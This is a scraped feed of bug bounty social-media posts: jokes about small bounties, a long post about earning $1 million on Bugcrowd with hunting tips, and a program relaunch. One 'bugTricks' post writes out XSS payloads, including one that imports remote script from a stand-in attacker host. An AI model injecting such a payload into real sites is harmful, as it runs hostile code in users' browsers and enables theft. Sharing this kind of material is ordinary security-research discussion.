Marco (@jmo740)
366 posts


Oh God - Next JS
Another few (bugs) with @mashoud1122 and this is bad.
English

"here's your bounty, go buy yourself something nice"
"this is $7"
"I SAID SOMETHING NICE NOT SOMETHING EXPENSIVE"
Eslam Monex 🕵️🧑💻@eslam_monex
We got Trevor in HackerOne before GTA 6 #BugBounty
English


bugTricks# Top Tier Bug Hunter Mindset
<img src=x onerror=alert(1)> --> don't report P3 Medium bug
<img src=x onerror=import("attacker.com/evil.js")> -> P1/P2 Critical/High Bug
English

I did it—$1 million on @Bugcrowd
For a lot of people this might be a small achievement, but for me, I’ve been waiting for this!
Do you know the most important tip in bug bounty? Choose one favorite program and spend years working on it. That’s my way. I’ve been working on the same program for about 3–4 years—every day on the same program. When I get bored or can’t find anything, I switch to another program until I find a bug, then I go back to my favorite program again.
After 3–4 years of hunting the same program, this helped me understand the team’s weak points. For example, they often ship ASMX/SVC endpoints without securing them, and they sometimes leave backup files in the web app, etc. With this approach, I made more than $750K from that one program alone!
Another tip—my personal rule—is: when I hunt a new program, I never leave or give up until I find a P1 or P2. If you make that deal with yourself, you’ll be unstoppable!
Believe me, these two tips are the keys to success in bug bounty that few people talk about.
Finally, huge thanks to the @Bugcrowd team for their support—I really love that team. Thanks to @RelentlessT7,
Timmy_Bugcrowd, @Masonhck3571, and all the triagers! Also thanks to FIS Global and their lovely security team!
Your turn now to make $1M—you can do it!
#ItTakesACrowd #CyberSecurity #infosec #redteam #BlueTeam #BugBounty #bugbountytips #bugbountytip #HackerCommunity #Bugcrowd

English

Happy to have re-launched our program on @Hacker0x01 last week! Let's squash them bugs!
English
















